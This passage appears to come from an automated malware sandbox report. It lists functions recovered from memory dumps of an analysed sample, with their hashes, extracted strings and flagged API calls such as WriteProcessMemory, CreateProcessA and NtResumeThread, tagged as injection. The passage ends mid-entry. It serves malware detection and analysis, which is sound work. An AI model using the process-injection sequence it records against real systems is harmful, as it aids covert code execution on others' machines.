foq, xrefs: 069C437D
8, xrefs: 069C436A
I?~n, xrefs: 069C4765

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID:
String ID: foq$8$I?~n
API String ID: 0-3888458177
Opcode ID: bfe83c2a52b96a4b8b7bf2ac6ad803bc160e4a65a43fea059ffc51a2c0595dcb
Instruction ID: da1b996442044bcfaf4569a46e385a294d02b32eabcb64dc6e87fec4747620a9
Opcode Fuzzy Hash: bfe83c2a52b96a4b8b7bf2ac6ad803bc160e4a65a43fea059ffc51a2c0595dcb
Instruction Fuzzy Hash: E552D675E006298FDBA4DF68C850AD9BBB1FF89310F1085EAD909A7355DB30AE85CF50

Function 069D4CFA Relevance: 3.8, Strings: 2, Instructions: 1342
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 069D5CE6
$jq, xrefs: 069D536A

Memory Dump Source

Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69d0000_file.jbxd

Similarity

API ID:
String ID: 2$$jq
API String ID: 0-2230393480
Opcode ID: 2f94db3c1b7c470df87e5516aa4bb75123b387412d40df0c524467b720be0786
Instruction ID: b61a06d37d5b0a0c870b335ecf2f1752f1ee73ae9684da7edfd0db79274d6e04
Opcode Fuzzy Hash: 2f94db3c1b7c470df87e5516aa4bb75123b387412d40df0c524467b720be0786
Instruction Fuzzy Hash: 16E2E474E056288FDB64DF68D88469EBBF2FB89300F1081E9D509A7359DB34AE85CF50

Function 06CA35B0 Relevance: 3.1, Strings: 2, Instructions: 639
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$jq, xrefs: 06CA387E
Pljq, xrefs: 06CA3798

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: Pljq$$jq
API String ID: 0-1466860515
Opcode ID: d0ee1e08cecf4a12c9f80d1253baf56b347cd0d186b07105a2e4d94d290c70e4
Instruction ID: 0e573a1496bc8f9bb9f416fa580a152a09f687287353149a202a078520867d47
Opcode Fuzzy Hash: d0ee1e08cecf4a12c9f80d1253baf56b347cd0d186b07105a2e4d94d290c70e4
Instruction Fuzzy Hash: 35328C30B0024ACFDB54DF69C9A4A6AB7F6BF89304B2585A9D40ACB3B5DB31DC41CB50

Function 069C4250 Relevance: 2.7, Strings: 2, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

foq, xrefs: 069C437D
h, xrefs: 069C435E

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID:
String ID: foq$h
API String ID: 0-619432838
Opcode ID: 28ce688db50bb7c6faac43034748b982ca563425be818937b8959a3d3f4d317a
Instruction ID: 3ca26ad4fcb7d53e0d4836005f1487dce5d3daf9f879bec0b05cbf6373e47296
Opcode Fuzzy Hash: 28ce688db50bb7c6faac43034748b982ca563425be818937b8959a3d3f4d317a
Instruction Fuzzy Hash: 0C71F875E00628CFEB54DF69C850AD9B7B2FF89310F1086AAD50DA7254DB306E85CFA1

Function 06E4E6C0 Relevance: 2.7, Strings: 2, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

T(u+, xrefs: 06E4E71E
Bv0s, xrefs: 06E4E7BD

Memory Dump Source

Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e30000_file.jbxd

Similarity

API ID:
String ID: Bv0s$T(u+
API String ID: 0-3775074207
Opcode ID: 81849230122406650552ffc63c57caa6f1599ad102d57b52c7dea978c40cf9e2
Instruction ID: b99c13fbaef1f2b9f23f4ae2677aca4a9895b6fd6d853228e2c2860c59e91e47
Opcode Fuzzy Hash: 81849230122406650552ffc63c57caa6f1599ad102d57b52c7dea978c40cf9e2
Instruction Fuzzy Hash: 4571D874A01318DFDB94DF78D954BA9BBF2FB48310F1090A9E41AA7395DB35AA84CF01

Function 0699B79E Relevance: 1.6, Strings: 1, Instructions: 376COMMON

Download Yara Rule

Strings

Tejq, xrefs: 0699BA70

Memory Dump Source

Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6990000_file.jbxd

Similarity

API ID:
String ID: Tejq
API String ID: 0-2468842661
Opcode ID: 7e96c6e7685bb5a91983351b79da30dba51f4c97f543e66987ce1b98d22682a8
Instruction ID: 30fb9ec633048ae437bdb89f679caf22ff1c9d1941689dd0ef576756e4cee040
Opcode Fuzzy Hash: 7e96c6e7685bb5a91983351b79da30dba51f4c97f543e66987ce1b98d22682a8
Instruction Fuzzy Hash: 96021770A05218CFEB94DF6CD884B9AB7B6FB49300F1084AAD50DA7759DB34AD84CF60

Function 069C7720 Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 069C77B1

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4b1880eaeb68c4a6782023fdca99c76fa4d505e7ec8e04a980451ca744de57c5
Instruction ID: f3d5a565d5f099215ee70c8743c44f262df7eae5a6698edbc3817f55dc6fd142
Opcode Fuzzy Hash: 4b1880eaeb68c4a6782023fdca99c76fa4d505e7ec8e04a980451ca744de57c5
Instruction Fuzzy Hash: 5F21F3B1D012499FDB10DFAAD984AEEBBF5FF48310F20842AE419A7250CB759944CBA1

Function 069C7728 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 069C77B1

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 21930c62c740a70fd157779e93fdef0b7dc6fe7ffc6c052de5d397bcd0255d9d
Instruction ID: d76b4284782737ed16bd9ce1b55bb5b81350961e4bf3d7084e7d15ab533f891d
Opcode Fuzzy Hash: 21930c62c740a70fd157779e93fdef0b7dc6fe7ffc6c052de5d397bcd0255d9d
Instruction Fuzzy Hash: F921D4B1D013499FCB10DFAAD984ADEFBF5FF48310F20842AE519A7250C775A944CBA1

Function 069C9880 Relevance: 1.6, APIs: 1, Instructions: 59nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 069C98F6

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 83a81fe8a41783d3dbd35c1eca6285d089ac53f6510077f33c6a51db6aabb44f
Instruction ID: 0536f535d800d672d4c5bf2f7a96ef4be80ab9dd7c345599709a87db24e65f7e
Opcode Fuzzy Hash: 83a81fe8a41783d3dbd35c1eca6285d089ac53f6510077f33c6a51db6aabb44f
Instruction Fuzzy Hash: 4A1127B1D002498ADB10DFAAC485AEFFBF4EF49320F50842AD419A3240CB78A944CFA1

Function 069C9888 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 069C98F6

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 81e415e8d17395ecd680cab82fa3c4507464a333766171808af23b4f7f744a7c
Instruction ID: 41aa0fb5156a0c6af335f709591430bc7ed1e6828370057c07ff27c35307bbd7
Opcode Fuzzy Hash: 81e415e8d17395ecd680cab82fa3c4507464a333766171808af23b4f7f744a7c
Instruction Fuzzy Hash: 8611E7B1D003498EDB10DFAAC484AAFFBF4EF49320F50842AD419A7250CB78A944CFA1

Function 069A425D Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

PHjq, xrefs: 069A454F

Memory Dump Source

Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69a0000_file.jbxd

Similarity

API ID:
String ID: PHjq
API String ID: 0-751881793
Opcode ID: 5dd9e58bde1bb553fe370bf8d7ad4e7a8e078f7e15de24bed25d0989de4d4b29
Instruction ID: 8f86d9e5512cd6e4a1025369b607c0721f51825239976cafaa8717f66483db8c
Opcode Fuzzy Hash: 5dd9e58bde1bb553fe370bf8d7ad4e7a8e078f7e15de24bed25d0989de4d4b29
Instruction Fuzzy Hash: B6C12470E04318CFEB90DFA8D984B9DBBF2FB49704F2090A9C409A7655DBB05985CF81

Function 06993610 Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

Tejq, xrefs: 069936EE

Memory Dump Source

Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6990000_file.jbxd

Similarity

API ID:
String ID: Tejq
API String ID: 0-2468842661
Opcode ID: ebc73fdf40c3e88eca8ab62207997d07e82958a3250bc30a3faf3dc73a3939d0
Instruction ID: a40f5d149f45528ccfe83ee1090e43a828b0608cb028c1b726ead0f3124d4030
Opcode Fuzzy Hash: ebc73fdf40c3e88eca8ab62207997d07e82958a3250bc30a3faf3dc73a3939d0
Instruction Fuzzy Hash: 34B1F470E05218CFEBA4CFAAD984B9DBBF6BB48304F2090A9D419E7755D7309985CF60

Function 06993620 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

Tejq, xrefs: 069936EE

Memory Dump Source

Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6990000_file.jbxd

Similarity

API ID:
String ID: Tejq
API String ID: 0-2468842661
Opcode ID: cf6b5ddce42a1184e32ca136735dbce02b6e517ec38eaab551129db9c9bf5f64
Instruction ID: f5077094ebebefa2134592c7174de32fdeb4e5c00489b5d13208b467ab868d37
Opcode Fuzzy Hash: cf6b5ddce42a1184e32ca136735dbce02b6e517ec38eaab551129db9c9bf5f64
Instruction Fuzzy Hash: 60B1F4B0E05218CFEFA4CFAAD984B9DBBF6BB49300F2090A9D419A7655D7305D85CF60

Function 069D666B Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf422d5106329b0d53924c41dec032cdefa658af150fb6b74979958e169ac97
Instruction ID: a45b853d2218cff65e0f5482a315d6493dfcbb086229f5b733d1cc248264eb2e
Opcode Fuzzy Hash: baf422d5106329b0d53924c41dec032cdefa658af150fb6b74979958e169ac97
Instruction Fuzzy Hash: 0952C574A046288FDB64DF28C984B9AB7B6FF89301F1081E9D50DA7355DB34AE85CF60

Function 069A7F51 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 718fb496679ae18d82f18f3169f909c135dd7281a594706799c3ed7a718145c5
Instruction ID: e1f5dddf5db3181ffbed7f9eabbe05c4886d82f55869e1eee66e6a884216b80f
Opcode Fuzzy Hash: 718fb496679ae18d82f18f3169f909c135dd7281a594706799c3ed7a718145c5
Instruction Fuzzy Hash: 5CA13774E05208CFDB94DFA9D444BAEBBF2FB89300F109069D419A7655DB34AD85CFA0

Function 069C7470 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56eaa6809fc8f45db4b8fda7e2dd73004344e97a4b57177356a094ea481f579
Instruction ID: 38f7203173a7b64157a03a9458abfd58990dfdac375eb8bf78b5ce37ce63d259
Opcode Fuzzy Hash: d56eaa6809fc8f45db4b8fda7e2dd73004344e97a4b57177356a094ea481f579
Instruction Fuzzy Hash: 1981F874E00208DFDB44DF99D580AAEBBF6FF88310F10842AE419AB355DB34A945CF61

Function 069C7480 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1ad4f22ca2e6c4ea349dc4f77ffc529cead67ba0445ff11ddcfa3310b887b7
Instruction ID: a620a867c718646d5be17bef9220b2701b87dd9586eeffb38c85d9e3abbe8871
Opcode Fuzzy Hash: 9b1ad4f22ca2e6c4ea349dc4f77ffc529cead67ba0445ff11ddcfa3310b887b7
Instruction Fuzzy Hash: F481D574E00209DFDB44DF99D584AAEBBF6FF88310F10842AE419AB754DB34A945CF61

Function 068F07D8 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2132942549.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c9e5e3baa4239f1e6e6dfe8d1ff9e287515fa553bc37a95e0391fef27803e6
Instruction ID: 30e8fc5e2f6b6cc42d9209e44faef1bbb4711998bcab0adb382ff9c169bb7ddd
Opcode Fuzzy Hash: c0c9e5e3baa4239f1e6e6dfe8d1ff9e287515fa553bc37a95e0391fef27803e6
Instruction Fuzzy Hash: F8512175D056189BEB6CCF2B8D556DAFAF3AFC9300F14C0F9960CA6254EB744A818F40

Function 06CA5D48 Relevance: 4.2, Strings: 3, Instructions: 482
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hnq, xrefs: 06CA629C
Hnq, xrefs: 06CA624C
Hnq, xrefs: 06CA621D

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: Hnq$Hnq$Hnq
API String ID: 0-1699790779
Opcode ID: a166b41a62e1bae6efedf4f116b74c95a2fe933353c6d7811775827a5d5ef52f
Instruction ID: 26ae35f63c9f5ca8a99b0fbe332ee2a116a2fa515d44f18621f203558682d182
Opcode Fuzzy Hash: a166b41a62e1bae6efedf4f116b74c95a2fe933353c6d7811775827a5d5ef52f
Instruction Fuzzy Hash: 6C124B30A003059FCB64DFA5C894A6EBBF2FF84304F14856DD50A9B795DB35E946CBA0

Function 06CAC160 Relevance: 4.1, Strings: 3, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(nq, xrefs: 06CAC289
(nq, xrefs: 06CAC2B5
Hnq, xrefs: 06CAC2E1

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: (nq$(nq$Hnq
API String ID: 0-1151833592
Opcode ID: d19fd6fff03a3034890e3313c1b0d72ca4928ebfffff0f6c3608c93f8e10dfad
Instruction ID: a7d9e65c90f4e3aefee72a847fdf72e390f2a567d4c8bf2116421a8f6d994b17
Opcode Fuzzy Hash: d19fd6fff03a3034890e3313c1b0d72ca4928ebfffff0f6c3608c93f8e10dfad
Instruction Fuzzy Hash: 18F15434A01309DFCB44EFA4D5949ADBBB2FF89314F118569E806AB365DB30ED42CB91

Function 06CA7B78 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'jq, xrefs: 06CA7EF1
4'jq, xrefs: 06CA7D92
4'jq, xrefs: 06CA7E71

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq
API String ID: 0-3078559419
Opcode ID: d3701e6f396bad9eba21469817698a5085fc76560c3e096874d7994db4be45e2
Instruction ID: 9fe1d7a9564532cf8ae215156629c8156f2db96a08e6254dc71b00709111385e
Opcode Fuzzy Hash: d3701e6f396bad9eba21469817698a5085fc76560c3e096874d7994db4be45e2
Instruction Fuzzy Hash: CDF1EB34B11219DFCB44DF64D998A9DBBB2FF88304F118158E906AB3A5DB70ED42CB50

Function 06951EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06952669
4'jq, xrefs: 06952659

Memory Dump Source

Source File: 00000000.00000002.2133069233.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6950000_file.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: 3e0f54cb01adb2fe3f3fc3bba6cc7d1ccd84aabef103cdabb78c07ad999880f1
Instruction ID: e316a9542948c3ce58c942b4075ec0c05398e925feb883b6217bb7ebf9f61c83
Opcode Fuzzy Hash: 3e0f54cb01adb2fe3f3fc3bba6cc7d1ccd84aabef103cdabb78c07ad999880f1
Instruction Fuzzy Hash: 44420534E04209CFEB54DFA8D4586BEB7B6FF88300F21845AD912AB654D734AE42DF91

Function 069529D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'jq, xrefs: 06952E76
4'jq, xrefs: 06952E66

Memory Dump Source

Source File: 00000000.00000002.2133069233.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6950000_file.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: 502582ff5dc991bb72f60032dc2dbd169e810102959153c2e86d52b904a0d448
Instruction ID: 9521f39dc4672171167bac92a1b46fd39e7593b9c2b22119082289d2f33934b7
Opcode Fuzzy Hash: 502582ff5dc991bb72f60032dc2dbd169e810102959153c2e86d52b904a0d448
Instruction Fuzzy Hash: 02F1E534D01208DFDB94DFA4D4986ACBBB6FF89315F20446AE806A7390DB34AE85CF50

Function 06CA5800 Relevance: 2.9, Strings: 2, Instructions: 351
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 06CA5A61
(nq, xrefs: 06CA5814

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: (nq$d
API String ID: 0-2356140993
Opcode ID: e1b7d0988489559fc7fde0cd49905812108644cf1573c0b924f6ec1bf35ae33b
Instruction ID: 2f0ee1fa400e0b626dae9ef3a0c223561acf5451a182dd0c450bb09095fe2d4c
Opcode Fuzzy Hash: e1b7d0988489559fc7fde0cd49905812108644cf1573c0b924f6ec1bf35ae33b
Instruction Fuzzy Hash: C2D156307007028FCB54CF28C58496ABBF6FF88314B99C969D45A9B665DB30FD46CBA0

Function 06CA1889 Relevance: 2.7, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(nq, xrefs: 06CA199E
Hnq, xrefs: 06CA1A2D

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: (nq$Hnq
API String ID: 0-3116299003
Opcode ID: dcb97325e05aa39a19602349ae8a0462f1140cfe25ffcbb47cbbfd850e922c4e
Instruction ID: f6259161f14d93d04d6c8615e1bab1ab95b505d193e2f11d9eb799245ae3d644
Opcode Fuzzy Hash: dcb97325e05aa39a19602349ae8a0462f1140cfe25ffcbb47cbbfd850e922c4e
Instruction Fuzzy Hash: 4351AD307043059FC799AF38C854A6E7BA6FF86314B1844ACE5068B7A5DF35ED06CBA1

Function 06CA3E40 Relevance: 2.7, Strings: 2, Instructions: 151COMMON

Download Yara Rule

Strings

(nq, xrefs: 06CA3FAB
(nq, xrefs: 06CA3F54

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: (nq$(nq
API String ID: 0-2974481825
Opcode ID: bc85da9b89c617552ff6dad2ea926f2b7cfab77b815767ddc69de110f85c02ca
Instruction ID: 6a3c98d073bc8a98c639a2bdf0ad2818e03740cd30a3044b8c2ca14b8845ff70
Opcode Fuzzy Hash: bc85da9b89c617552ff6dad2ea926f2b7cfab77b815767ddc69de110f85c02ca
Instruction Fuzzy Hash: F151DE317042459FDB959F28D854AAE3BA6FF84314F21846DE90ACB395CF39DD06C7A0

Function 06CA8A58 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,nq, xrefs: 06CA8DD3

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: ,nq
API String ID: 0-1069744364
Opcode ID: 445d39f72e69d256e6923409646d050d7577264ed90df9e961828f9bea637ff4
Instruction ID: 47c0dbb963e8cd464081571ca7a7af59c0d47516d8d2d34940c3946d6a36fb27
Opcode Fuzzy Hash: 445d39f72e69d256e6923409646d050d7577264ed90df9e961828f9bea637ff4
Instruction Fuzzy Hash: 1D521675A002288FDB64DF69C985BEDBBF6BF88300F1541D9E509A7391DA309E81CF61

Function 06CA2E30 Relevance: 1.8, Strings: 1, Instructions: 536COMMON

Download Yara Rule

Strings

(_jq, xrefs: 06CA30CD

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: (_jq
API String ID: 0-2603807687
Opcode ID: 063cb768cf9d9af57bb30574c98b76ec5dab92ac57bb952f021edf670980e837
Instruction ID: bdeabcb67e7e0ad21e57efde044c85913f3553e985c15b02ae3a06177292b052
Opcode Fuzzy Hash: 063cb768cf9d9af57bb30574c98b76ec5dab92ac57bb952f021edf670980e837
Instruction Fuzzy Hash: 3E227D35A002159FDB44DFA9C894AADBBB2FF88304F158059E909EB3A5CB75ED41CB90

Function 069C8185 Relevance: 1.7, APIs: 1, Instructions: 205processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 069C836A

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: da5eda7f549339f3acc18083644435a8ba7851212f61299dabc9662ce44b3846
Instruction ID: 4231f60b9d2fdc25074befee7abc6a2da4dd9ca4c4c1e50008d1a1e547a0c53c
Opcode Fuzzy Hash: da5eda7f549339f3acc18083644435a8ba7851212f61299dabc9662ce44b3846
Instruction Fuzzy Hash: 80816870D006098FDB50CFA9C9957EEBFF6BF48360F24852DE815A7654DB749882CB82

Function 069C8190 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 069C836A

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6526d4cb2b47df17f8f7f127275b2da300aba7fc536193fd3e98d2bbb7ebddb7
Instruction ID: 2b595d8d4b559fd624b01f408fe40e1ac3e2cfcb93ab0471b4953cd3a96e9bee
Opcode Fuzzy Hash: 6526d4cb2b47df17f8f7f127275b2da300aba7fc536193fd3e98d2bbb7ebddb7
Instruction Fuzzy Hash: C7816871D006098FDB50CFA9C9957EEBFF6BF48320F24852DE814A7654DB749882CB82

Function 024EAA28 Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 024EAC7E

Memory Dump Source

Source File: 00000000.00000002.2111646564.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 359aab8210800e00db7ab21b58f48d1f8f443d37b583baf1fb786e77fe1372a7
Instruction ID: beaa7d9ac521f586f1932c04677eea117b64e1204e61bdc4b05a9344c2e94592
Opcode Fuzzy Hash: 359aab8210800e00db7ab21b58f48d1f8f443d37b583baf1fb786e77fe1372a7
Instruction Fuzzy Hash: 3C711370A00B158FEB24DF6AD14475BBBF6BF88304F04892ED48A97B50D775E845CBA0

Function 069C9208 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 069C92A0

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f46eb15c86abab3182340d9e12a958a28de35238496e52ee9b4bfd2264697dd7
Instruction ID: 990643465a444f653e66513f15a664d72069e56409aa744d265a2b8ff0713f72
Opcode Fuzzy Hash: f46eb15c86abab3182340d9e12a958a28de35238496e52ee9b4bfd2264697dd7
Instruction Fuzzy Hash: 7D214871D00249DFDB10CFAAC885BEEBBF5FF48310F10842AE959A7250CB789945CBA1

Function 069C9210 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 069C92A0

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 165d9c4593ebdf02a179a68d1a7b587da052ccadec12e599af1d39dc0ba0a3bd
Instruction ID: dde35fc435078afedf1a35e986f7986e4e1b34083af2936627e5e1bdab386f8b
Opcode Fuzzy Hash: 165d9c4593ebdf02a179a68d1a7b587da052ccadec12e599af1d39dc0ba0a3bd
